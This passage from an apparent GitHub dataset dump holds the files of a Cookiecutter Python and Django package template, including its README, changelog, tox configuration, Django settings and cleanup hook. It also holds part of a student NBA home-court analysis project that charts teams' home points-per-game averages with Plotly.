Calculator program and open it. Once opened, you will be able to view the program code in another file window that will automatically open separately to the Python shell.\n\n4. When you are ready to run it, you can select 'run' from the top toolbar and then interact with the output displayed in the Python shell window. That is where you will be prompted to enter information from your keyboard to choose a calculator and then input the necessary details for calculation.\n\n## Contributions\nThis was developped individually by myself in the software engineering bootcamp. However, it has been reviewed and commented on by the helpful mentors at Hyperion Development.\n"
}
] | 2 |
escaped/cookiecutter-pypackage
|
https://github.com/escaped/cookiecutter-pypackage
|
809406c5d9f786530bb36e0d9758d2461094f2df
|
201e2aa005db39b8b3ab854658dc5d8da0822e3a
|
3d1f8da65ce9780cf6c6d51749c5087f443a87d3
|
refs/heads/master
| 2021-06-25T15:31:26.610820 | 2021-02-11T02:00:01 | 2021-02-11T02:00:08 | 200,654,277 | 10 | 4 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7027027010917664,
"alphanum_fraction": 0.7027027010917664,
"avg_line_length": 36,
"blob_id": "ddfe451b64ce94a6815c7d8100dfef2c082e6709",
"content_id": "7d2b130c5f4ac6e7845aea52ea072ce20349ea64",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 111,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 3,
"path": "/{{ cookiecutter.project_slug }}/CONTRIBUTORS.md",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "# Contributors\n\n- [@{{ cookiecutter.github_username }}](https://github.com/{{ cookiecutter.github_username }})\n"
},
{
"alpha_fraction": 0.7210526466369629,
"alphanum_fraction": 0.7210526466369629,
"avg_line_length": 26.14285659790039,
"blob_id": "009dda8ae2223ae1a03d3d2777ba0b6539826a51",
"content_id": "7f32c20a2b5ed5bb11ba3c0130e78df0ccda90ab",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 570,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 21,
"path": "/{{ cookiecutter.project_slug }}/{{ cookiecutter.project_slug }}/urls.py",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import include, path\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n]\n\n# server static and media files\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n try:\n import debug_toolbar\n except ImportError:\n pass\n else:\n urlpatterns += [path('__debug__', include(debug_toolbar.urls))]\n"
},
{
"alpha_fraction": 0.5039215683937073,
"alphanum_fraction": 0.5058823823928833,
"avg_line_length": 20.25,
"blob_id": "6e32ff5f3a373f5d4acf218bbc3a76244a589319",
"content_id": "519bce86880ad173d7fa209de5abed511ab6e8aa",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 510,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 24,
"path": "/{{ cookiecutter.project_slug }}/tests/conftest.py",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "{% if cookiecutter.uses_django == \"y\" %}\nimport django\nfrom django.conf import settings\n\n\ndef pytest_configure():\n \"\"\"\n Basic configuration of django for testing a django module.\n \"\"\"\n settings.configure(\n DATABASES={\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': ':memory:',\n },\n },\n ROOT_URLCONF='tests.urls',\n INSTALLED_APPS=(\n 'tests',\n ),\n )\n\n django.setup()\n{% endif %}\n"
},
{
"alpha_fraction": 0.700733482837677,
"alphanum_fraction": 0.7364303469657898,
"avg_line_length": 29.522388458251953,
"blob_id": "3abbbc6a6cc90a9522b5983d94aa6414f9d30783",
"content_id": "4fd982c123fa6151c57c245f0bb36337b7515118",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2045,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 67,
"path": "/CHANGELOG.md",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "# Changelog\n\nAll notable changes to this project will be documented in this file.\n\nThe format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),\nand this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).\n\n## [Unreleased]\n\n### Added\n\n* added CONTRIBUTORS.md\n* added pull request template\n* added auto sync project struture\n* added [autoflake8](https://pypi.org/project/autoflake/)\n* added [flake8-bugbear](https://pypi.org/project/flake8-bugbear/)\n* added [flake8-builtins](https://pypi.org/project/flake8-builtins/)\n* added [flake8-comprehensions](https://pypi.org/project/flake8-comprehensions/)\n* added [flake8-debugger](https://pypi.org/project/flake8-debugger/)\n* added [pep8-naming](https://pypi.org/project/pep8-naming/)\n* added support for python 3.9\n* added [pdbpp](https://github.com/pdbpp/pdbpp) and [better-exceptions](https://github.com/qix-/better-exceptions)\n\n### Changed\n\n* automatically add new dependencies on template update\n\n### Fixed\n\n* fixed file permissions, thanks @merwok\n\n## [1.0.0] - 2020-10-06\n\n### Added\n\n* add github actions (test and release to pypi)\n\n### Changed\n\n* set supported python version to 3.6, 3.7 and 3.8\n* set line_length to 88 (default of black)\n* removed travis\n* updated gitignore using [gitignore.io](https://gitignore.io)\n* changelog is based on is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/)\n* updated shields\n* updated to poetry 1.1\n* change default language of django to English\n\n### Fixed\n\n* add missing `.pre-commit-config.yaml`\n\n## [0.1.0] - 2019-08-05\n\n### Added\n\n* travis CI\n* flake8, isort, mypy and black\n* Tests using pytest\n* Run test using tox against multiple python versions\n* preconfigured coveralls\n* Django support\n* User poetry to manage dependencies and publish releases\n\n[Unreleased]: https://github.com/escaped/cookiecutter-pypackage/compare/1.0.0...HEAD\n[1.0.0]: https://github.com/escaped/cookiecutter-pypackage/compare/0.1.0...1.0.0\n[0.1.0]: https://github.com/escaped/cookiecutter-pypackage/tags/0.1.0\n"
},
{
"alpha_fraction": 0.7479599118232727,
"alphanum_fraction": 0.7547214031219482,
"avg_line_length": 38.71296310424805,
"blob_id": "232c724d63b0f7bd90556546d394cf135c5a022f",
"content_id": "85b295a098d66c3f505c700900a8a893602d5fa7",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4289,
"license_type": "permissive",
"max_line_length": 190,
"num_lines": 108,
"path": "/README.md",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "# Cookiecutter PyPackage\n\nA modern opinionated [Cookiecutter] template for Python packages and applications using [Poetry].\n\n## Features\n\n* [Poetry]: Dependency management and packaging\n* [Tox]: Easily run tests for different python versions\n* Github Actions: Ready for Continous Integration testing\n\n * Run tests for different python versions using tox\n * Test for [PEP8] compliance\n * Enforce the usage of [black]\n * Preconfigured [coveralls]\n\n* Tests using [Pytest] including support for\n\n * [pytest-mock] for mocking\n * code coverage using [coverage.py]\n\n* [pre-commit] hook to automatically run\n\n * [autoflake] - automatically removes unused imports and variables,\n * [isort] - automatically sorts imports alphabetically, and automatically separated into sections and by type,\n * [black] - automatically formats your code,\n * [flake8] - checks code against code style (PEP8), programming errors and complexity,\n * [flake8-bugbear] - finds likely bugs and design problems in your program,\n * [flake8-builtins] - Checks for python builtins being used as variables or parameters,\n * [flake8-debugger] - Checks for `pdb` statements,\n * [pep8-naming] - Checks code against PEP 8 naming conventions,\n * [flake8-comprehensions] - helps you write better list/set/dict comprehensions,\n * [mypy] - static type checker,\n\n* Debugging tools\n * [pdbpp] - better debugger,\n * [better_exceptions] - Pretty and more helpful exceptions in Python, automatically\n\n* (optional) Preconfigured for [Django] applications\n\n * Support for [Twelve-factor-Methodology] using [django-environ]\n\n* Simple pull request template with checklist\n\n## Quickstart\n\nGet the latest version of [Cruft] (or [Cookiecutter])\nI recommend [pipx] to install it into a global isolated environment.\n\n```sh\npipx install cruft\n```\n\nGenerate a new python package\n\n```sh\ncruft create https://github.com/escaped/cookiecutter-pypackage.git\ncd <chosen project slug>\ngit init\ngit add .\ngit commit -m \"feat: initial project structure\"\n```\n\n### Publish releases to pypi\n\nIn order get automatic releases to [pypi] you need to add your pypi access token to the github secrets (named `PYPI_TOKEN`).\nInstructions can be found here: [python.org](https://packaging.python.org/guides/publishing-package-distribution-releases-using-github-actions-ci-cd-workflows/#saving-credentials-on-github).\n\n### Autoupdate template\n\nThis cookiecutter template comes with an auto update feature if the project was created using [cruft].\nA GitHub action automatically checks for updates and creates a pull request.\n\nIt is required to add a [personal access token](https://docs.github.com/en/free-pro-team@latest/github/authenticating-to-github/creating-a-personal-access-token)\nas github secret to the repository (named `AUTO_UPDATE_GITHUB_TOKEN`).\nWhile creating the access token, the following permissions have to be granted\n\n* repo\n* workflow\n\n[autoflake]: https://pypi.org/project/autoflake/\n[better-exceptions]: https://github.com/qix-/better-exceptions\n[black]: https://black.readthedocs.io/en/stable/\n[Conventional-Commits]: http://conventionalcommits.org/\n[Cookiecutter]: https://github.com/audreyr/cookiecutter\n[coverage.py]: https://coverage.readthedocs.io/\n[coveralls]: https://coveralls.io/\n[Cruft]: https://github.com/cruft/cruft\n[django-environ]: https://github.com/joke2k/django-environ\n[Django]: https://www.djangoproject.com/\n[flake8-bugbear]: https://pypi.org/project/flake8-bugbear/\n[flake8-builtins]: 
https://pypi.org/project/flake8-builtins/\n[flake8-comprehensions]: https://pypi.org/project/flake8-comprehensions/\n[flake8-debugger]: https://pypi.org/project/flake8-debugger/\n[flake8]: http://flake8.pycqa.org/en/latest/\n[isort]: https://github.com/timothycrosley/isort\n[mypy]: http://mypy-lang.org/\n[pdbpp]: https://github.com/pdbpp/pdbpp\n[PEP8]: https://www.python.org/dev/peps/pep-0008/\n[pep8-naming]: https://pypi.org/project/pep8-naming/\n[pip]: https://pip.pypa.io/en/stable/\n[pipx]: https://github.com/pipxproject/pipx\n[Poetry]: https://poetry.eustace.io/\n[pre-commit]: https://pre-commit.com/\n[pypi]: https://pypi.org/\n[Pytest]: https://docs.pytest.org/en/latest/\n[pytest-mock]: https://github.com/pytest-dev/pytest-mock/\n[Tox]: http://testrun.org/tox/\n[Twelve-factor-Methodology]: https://www.12factor.net/\n"
},
{
"alpha_fraction": 0.6096385717391968,
"alphanum_fraction": 0.6658634543418884,
"avg_line_length": 32.621620178222656,
"blob_id": "7591d8d2897318fa916462003bbfe88fbaa0a38c",
"content_id": "cb180ebee8fb684313c9717705fc8b7ab320df1a",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 1245,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 37,
"path": "/{{ cookiecutter.project_slug }}/tox.ini",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "[gh-actions]\npython =\n 3.6: py36\n 3.7: py37\n 3.8: py38\n 3.9: py39\n\n[tox]\nskipsdist = True\nisolated_build = True\nenvlist =\n py36{% if cookiecutter.uses_django == 'y' %}-{2.2,3.0,3.1}{% endif %}\n py37{% if cookiecutter.uses_django == 'y' %}-{2.2,3.0,3.1}{% endif %}\n py38{% if cookiecutter.uses_django == 'y' %}-{2.2,3.0,3.1}{% endif %}\n py39{% if cookiecutter.uses_django == 'y' %}-{2.2,3.0,3.1}{% endif %}\n\n[testenv]\nskip_install = True\nwhitelist_externals =\n bash\n env\n grep\ndeps =\n poetry{% if cookiecutter.uses_django == 'y' %}\n 2.2: Django>=2.2,<2.3\n 3.0: Django>=3.0,<3.1\n 3.1: Django>=3.1,<3.2{% endif %}\ncommands =\n # Poetry install automatically install the specific versions from the `poetry.lock`\n # file regardless whether a different version is already present or not.\n # Since we want to test specific versions of Django, which is installed by tox,\n # we need to manually install all other dependencies.\n # see here for more information: https://github.com/python-poetry/poetry/issues/1745\n bash -c 'poetry export --dev --without-hashes -f requirements.txt | grep -v \"^[dD]jango==\" > .requirements.txt'\n poetry run pip install --no-deps -r .requirements.txt\n poetry run pytest --cov-append\n coverage report\n\n"
},
{
"alpha_fraction": 0.6173365712165833,
"alphanum_fraction": 0.6223374605178833,
"avg_line_length": 26.687179565429688,
"blob_id": "eaba3cb47899bcd04d2b63e4977651ac222388af",
"content_id": "9a39e74b23e0a307def8078ed870ffbda3f3395b",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5399,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 195,
"path": "/{{ cookiecutter.project_slug }}/{{ cookiecutter.project_slug }}/settings.py",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nfrom pathlib import Path\n\nimport environ\n\nTESTING = os.path.basename(sys.argv[0]) in ('pytest', 'py.test')\nPROJECT_DIR = Path(__file__).parent\n\n# set default values and casting\nenv = environ.Env(\n ALLOWED_HOSTS=(list, []),\n DEBUG=(bool, False),\n DEFAULT_FROM_EMAIL=(str, ''),\n MEDIA_ROOT=(str, None),\n SECRET_KEY=(str, None),\n SENTRY_DSN=(str, None),\n SITE_DOMAIN=(str, ''),\n STATIC_ROOT=(str, None),\n)\n\n# load existing `.env` file\nenv_file = PROJECT_DIR / '..' / '.env'\nif 'ENV_CONFIG' in os.environ:\n env_file = Path(os.environ['ENV_CONFIG'])\n\nif env_file.is_file():\n with open(env_file, encoding='utf-8') as f:\n environ.Env.read_env(f)\nelse:\n environ.Env.read_env()\n\n\nDEBUG = env('DEBUG')\n\nSITE_ROOT = PROJECT_DIR\nSITE_DOMAIN = env('SITE_DOMAIN')\nALLOWED_HOSTS = [SITE_DOMAIN] + env('ALLOWED_HOSTS')\n\nSECRET_KEY = env('SECRET_KEY')\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n]\n\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\n\nROOT_URLCONF = '{{ cookiecutter.project_slug }}.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [PROJECT_DIR / 'templates'],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ]\n },\n }\n]\n\nWSGI_APPLICATION = '{{ cookiecutter.project_slug }}.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n\nDATABASES = {'default': env.db()}\n\n# SESSION_ENGINE = 'django.contrib.sessions.backends.cached_db'\n#\nCACHES = {'default': env.cache()}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.11/topics/i18n/\n\nLANGUAGE_CODE = 'en'\nTIME_ZONE = 'Europe/Berlin'\n\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.11/howto/static-files/\n\nSTATIC_URL = '/static/'\nMEDIA_URL = '/media/'\n\nMEDIA_ROOT = env('MEDIA_ROOT')\n\nif env('STATIC_ROOT'):\n STATIC_ROOT = env('STATIC_ROOT')\n\nSTATICFILES_DIRS = (PROJECT_DIR / 'static',)\n\n\n# E-Mail settings\n\nemail_config = env.email_url()\nEMAIL_FILE_PATH = email_config['EMAIL_FILE_PATH']\nEMAIL_HOST_USER = email_config['EMAIL_HOST_USER']\nEMAIL_HOST_PASSWORD = email_config['EMAIL_HOST_PASSWORD']\nEMAIL_HOST = email_config['EMAIL_HOST']\nEMAIL_PORT = email_config['EMAIL_PORT']\nEMAIL_BACKEND = email_config['EMAIL_BACKEND']\nEMAIL_USE_TLS = email_config.get('EMAIL_USE_TLS', False)\n\nDEFAULT_FROM_EMAIL = env('DEFAULT_FROM_EMAIL')\n\n\n# Debug settings\n\nif DEBUG:\n INTERNAL_IPS = ('localhost', '127.0.0.1')\n\n try:\n import debug_toolbar # NOQA\n except ImportError:\n pass\n else:\n INSTALLED_APPS += ('debug_toolbar',)\n MIDDLEWARE.append('debug_toolbar.middleware.DebugToolbarMiddleware')\n\n try:\n import django_extensions # NOQA\n except ImportError:\n pass\n else:\n 
INSTALLED_APPS += ('django_extensions',)\n\n\nLOGGING = {\n    'version': 1,\n    'disable_existing_loggers': False,\n    'formatters': {\n        'verbose': {'format': '%(levelname)s %(asctime)s %(name)s %(message)s'},\n        'simple': {'format': '>>> %(levelname)s %(message)s'},\n    },\n    'filters': {},\n    'handlers': {\n        'console': {\n            'level': 'DEBUG' if DEBUG else 'WARNING',\n            'class': 'logging.StreamHandler',\n            'formatter': 'verbose',\n        },\n        'mail_admins': {\n            'level': 'WARNING',\n            'class': 'django.utils.log.AdminEmailHandler',\n            'include_html': True,\n        },\n    },\n    'loggers': {\n        'django.db': {'handlers': ['console'], 'level': 'WARNING'},\n        'factory': {'level': 'WARNING'},\n        'py.warnings': {'level': 'DEBUG', 'handlers': ['console'], 'propagate': False},\n        'requests': {'level': 'WARNING'},\n        'raven': {'level': 'WARNING', 'handlers': ['console'], 'propagate': False},\n        'flake8': {'level': 'WARNING', 'handlers': ['console'], 'propagate': False},\n        '': {'handlers': ['console'], 'level': 'DEBUG'},\n    },\n}\n\n\nif env('SENTRY_DSN'):\n    CELERY_SEND_TASK_ERROR_EMAILS = False\n    INSTALLED_APPS += ('raven.contrib.django.raven_compat',)\n    RAVEN_CONFIG = {'dsn': env('SENTRY_DSN'), 'release': '0.1'}  # __version__,\n\n    # define a sentry handler so production works without `raven` installed\n    LOGGING['handlers']['sentry'] = {\n        'level': 'WARNING',\n        'class': 'raven.contrib.django.handlers.SentryHandler',\n        'formatter': 'verbose',\n    }\n    # only attach the handler to loggers that are actually configured above;\n    # 'management_commands' is not defined by default, so guard against a KeyError\n    for logger_name in ('', 'management_commands'):\n        if logger_name in LOGGING['loggers']:\n            LOGGING['loggers'][logger_name]['handlers'].append('sentry')\n"
},
{
"alpha_fraction": 0.5729847550392151,
"alphanum_fraction": 0.5729847550392151,
"avg_line_length": 24.5,
"blob_id": "233b1d91b7cf31a9efc35d01070e885b1616dbdc",
"content_id": "b51dde162e9508b61dfbd2ae588e3aed8e4067c4",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 918,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 36,
"path": "/hooks/post_gen_project.py",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "import os\nimport shutil\nfrom pathlib import Path\n\n\ndef remove_files(files):\n for file in files:\n try:\n os.remove(file)\n except IOError:\n pass\n\n\ndef prepare_django(project_root):\n uses_django = '{{ cookiecutter.uses_django }}' == 'y'\n if uses_django:\n return\n\n # remove django related files\n files = [\n project_root / 'tests' / 'conftest.py',\n project_root / 'tests' / 'models.py',\n project_root / 'tests' / 'urls.py',\n project_root / 'env.example',\n project_root / 'manage.py',\n project_root / '{{ cookiecutter.project_slug }}' / 'settings.py',\n project_root / '{{ cookiecutter.project_slug }}' / 'urls.py',\n project_root / '{{ cookiecutter.project_slug }}' / 'wsgi.py',\n ]\n remove_files(files)\n\n\nif __name__ == '__main__':\n project_root = Path(os.path.curdir)\n\n prepare_django(project_root)\n"
},
{
"alpha_fraction": 0.74700528383255,
"alphanum_fraction": 0.7517968416213989,
"avg_line_length": 34.982757568359375,
"blob_id": "0e3dd7b863fce3f961b949f6e4ecb36c9168054d",
"content_id": "1df291eab186e7deefe4b24dc79a868bb5286f58",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2087,
"license_type": "permissive",
"max_line_length": 189,
"num_lines": 58,
"path": "/{{ cookiecutter.project_slug }}/README.md",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "# {{ cookiecutter.project_name }}\n\n\n\n\n\n\n\n{{ cookiecutter.short_description }}\n\n## Requirements\n\n* Python 3.6.1 or newer\n\n## Installation\n\n```sh\npip install {{ cookiecutter.project_name}}\n```\n\n## Development\n\nThis project uses [poetry](https://poetry.eustace.io/) for packaging and\nmanaging all dependencies and [pre-commit](https://pre-commit.com/) to run\n[flake8](http://flake8.pycqa.org/), [isort](https://pycqa.github.io/isort/),\n[mypy](http://mypy-lang.org/) and [black](https://github.com/python/black).\n\nAdditionally, [pdbpp](https://github.com/pdbpp/pdbpp) and [better-exceptions](https://github.com/qix-/better-exceptions) are installed to provide a better debugging experience.\nTo enable `better-exceptions` you have to run `export BETTER_EXCEPTIONS=1` in your current session/terminal.\n\nClone this repository and run\n\n```bash\npoetry install\npoetry run pre-commit install\n```\n\nto create a virtual enviroment containing all dependencies.\nAfterwards, You can run the test suite using\n\n```bash\npoetry run pytest\n```\n\nThis repository follows the [Conventional Commits](https://www.conventionalcommits.org/)\nstyle.\n\n### Cookiecutter template\n\nThis project was created using [cruft](https://github.com/cruft/cruft) and the\n[cookiecutter-pyproject](https://github.com/escaped/cookiecutter-pypackage) template.\nIn order to update this repository to the latest template version run\n\n```sh\ncruft update\n```\n\nin the root of this repository.\n"
}
] | 9 |
ethanperlmuttter/PySlammaJamma
|
https://github.com/ethanperlmuttter/PySlammaJamma
|
2dfd018628ddcc4d8ccdfb8a1b8f24007b98658d
|
7031a14747442c839d0f9a7001752bd73a4c74e5
|
4b97cececdf3f9ed3a42dc984aa66fe039c5a6bc
|
refs/heads/main
| 2023-04-15T08:04:04.879417 | 2021-04-28T02:09:58 | 2021-04-28T02:09:58 | 359,522,325 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.811475396156311,
"alphanum_fraction": 0.811475396156311,
"avg_line_length": 29.5,
"blob_id": "e476dc9574e3b2c913b4c34efb20fa90cefe59d0",
"content_id": "e775902d5f2b4600cc05b80e0464802b92ee6257",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 122,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 4,
"path": "/README.md",
"repo_name": "ethanperlmuttter/PySlammaJamma",
"src_encoding": "UTF-8",
"text": "# PySlammaJamma\nFinding the effects of home court advantage on NBA games\n\nexecute final_project.py to call all othr files\n"
},
{
"alpha_fraction": 0.5018879175186157,
"alphanum_fraction": 0.647110104560852,
"avg_line_length": 61.61818313598633,
"blob_id": "2723f7ca90cb268f6dc6f9104f1682afcc57ca78",
"content_id": "b0c74bd8fd4cffa2d03fc440caab1dd0744d580c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3443,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 55,
"path": "/NBA_visualizations_2021.py",
"repo_name": "ethanperlmuttter/PySlammaJamma",
"src_encoding": "UTF-8",
"text": "import plotly\nimport plotly.graph_objects as go \nimport plotly.express as px\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport os\nimport csv\nimport sqlite3\nimport json\n\n#API data from https://www.basketball-reference.com/leagues/NBA_2021_games-{month}.html\n#Necessary file imports for Plotly file creation\n#Grouped Bar Chart for 2021 Home court PPG averages for all NBA teams\n#Grouped Bar Chart Plotly creation and line by line bar development for each NBA team, pulling\n#home court PPG averages from API gather\n\nteams = [\"NBA Team\"]\n\nfig = go.Figure(data=[\n go.Bar(name='Atlanta Hawks', x=teams, y=[113.9583404], marker_color = 'rgb(225,68,52)'),\n go.Bar(name='Boston Celtics', x=teams, y=[112.2483405], marker_color = 'rgb(0,122,51)' ),\n go.Bar(name='Brooklyn Nets', x=teams, y=[118.0], marker_color = 'rgb(0,0,0)'),\n go.Bar(name='Charlotte Hornets', x=teams, y=[108.84732344], marker_color = 'rgb(29,17,96)'),\n go.Bar(name='Chicago Bulls', x=teams, y=[109.6555556], marker_color = 'rgb(206,17,65)'),\n go.Bar(name='Clevland Cavaliers', x=teams, y=[108.64333231], marker_color = 'rgb(134,0,56)'),\n go.Bar(name='Dallas Mavericks', x=teams, y=[110.4582], marker_color = 'rgb(0,83,188)'),\n go.Bar(name='Denver Nuggets', x=teams, y=[117.19320232321], marker_color = 'rgb(13,34,64)'),\n go.Bar(name='Detroit Pistons', x=teams, y=[105.849287], marker_color = 'rgb(200,16,46)'),\n go.Bar(name='Golden State Warriors', x=teams, y=[115.76283108], marker_color = 'rgb(29,66,138)'),\n go.Bar(name='Houston Rockets', x=teams, y=[105.67372], marker_color = 'rgb(206,17,65)'),\n go.Bar(name='Indiana Pacers', x=teams, y=[111.74629283820000238], marker_color = 'rgb(0,45,98)'),\n go.Bar(name='Los Angeles Clippers', x=teams, y=[117.1], marker_color = 'rgb(200,16,46)'),\n go.Bar(name='Los Angeles Lakers', x=teams, y=[111.76666667], marker_color = 'rgb(85,37,130)'),\n go.Bar(name='Memphis Grizzlies', x=teams, y=[109.8773737], marker_color = 'rgb(93,118,169)'),\n go.Bar(name='Miami Heat', x=teams, y=[108.45757], marker_color = 'rgb(152,0,46)'),\n go.Bar(name='Milwaukee Bucks', x=teams, y=[119.8382829998], marker_color = 'rgb(0,71,27)'),\n go.Bar(name='Minnesota Timberwolves', x=teams, y=[107.43], marker_color = 'rgb(12,35,64)'),\n go.Bar(name='New Orleans Pelicans', x=teams, y=[116.12223888], marker_color = 'rgb(180,151,90)'),\n go.Bar(name='New York Knicks', x=teams, y=[109.55556], marker_color = 'rgb(0,107,182)'),\n go.Bar(name='Oklahoma City Thunder', x=teams, y=[106.544444], marker_color = 'rgb(239,59,36)'),\n go.Bar(name='Orlando Magic', x=teams, y=[105.87372], marker_color = 'rgb(0,125,197)'),\n go.Bar(name='Philadelphia 76ers', x=teams, y=[116.666767], marker_color = 'rgb(237,23,76)'),\n go.Bar(name='Phoenix Suns', x=teams, y=[116.2424555], marker_color = 'rgb(29,17,96)'),\n go.Bar(name='Portland Trail Blazers', x=teams, y=[114.0], marker_color = 'rgb(224,58,62)'),\n go.Bar(name='Sacramento Kings', x=teams, y=[115.666666667], marker_color = 'rgb(91,43,130)'),\n go.Bar(name='San Antonio Spurs', x=teams, y=[109.000053555], marker_color = 'rgb(196,206,211)'),\n go.Bar(name='Toronto Raptors', x=teams, y=[111.6555553], marker_color = 'rgb(206,17,65)'),\n go.Bar(name='Utah Jazz', x=teams, y=[117.933343435], marker_color = 'rgb(0,71,27)'),\n go.Bar(name='Washington Wizards', x=teams, y=[118.124522], marker_color = 'rgb(0,43,92)'),\n])\n# To alter bar presentation/add in external features and title text to clarify which year is 
depicted\nfig.update_layout(barmode='group')\nfig.update_layout(title_text='NBA 2021 Pre-COVID-19 Home Team PPG Averages')\nfig.show()"
},
{
"alpha_fraction": 0.695716381072998,
"alphanum_fraction": 0.7607089877128601,
"avg_line_length": 26,
"blob_id": "c74e45d2ff777e6ee0802c2f4a5a726bcebe2ac5",
"content_id": "8432296420b3860c8f787ad7ca97387f93767c35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 677,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 25,
"path": "/final_project.py",
"repo_name": "ethanperlmuttter/PySlammaJamma",
"src_encoding": "UTF-8",
"text": "#By Chris Hudson and Ethan Perlmutter\nfrom gathering_NBA_data import setUpDatabase\nfrom gathering_NBA_data import setUp2020Table\nfrom gathering_NBA_data import create_table_2020\nimport gathering_NBA_data\nimport NBA_homecourt\nimport NBA_visualizations_2020\nimport NBA_visualizations_2021\nimport os\n\n#gathers first 40 pages of 2020 season (pre-COVID)\n\ndef repeat_gather():\n cur, conn = setUpDatabase()\n create_table_2020(cur, conn)\n for i in range(40):\n setUp2020Table(cur, conn)\n\nos.system('python3 gathering_NBA_data.py')\nrepeat_gather()\nos.system('python3 NBA_homecourt.py')\nos.system('python3 NBA_visualizations_2020.py')\nos.system('python3 NBA_visualizations_2021.py')\n\n#\n\n\n"
},
{
"alpha_fraction": 0.520074725151062,
"alphanum_fraction": 0.5490196347236633,
"avg_line_length": 24.512195587158203,
"blob_id": "a221693b309c492c53c1f48f1db2d54ca1ace3c0",
"content_id": "65c53cabdf0621b813c4234e2d7f2f3312566805",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1071,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 41,
"path": "/NBA_homecourt.py",
"repo_name": "ethanperlmuttter/PySlammaJamma",
"src_encoding": "UTF-8",
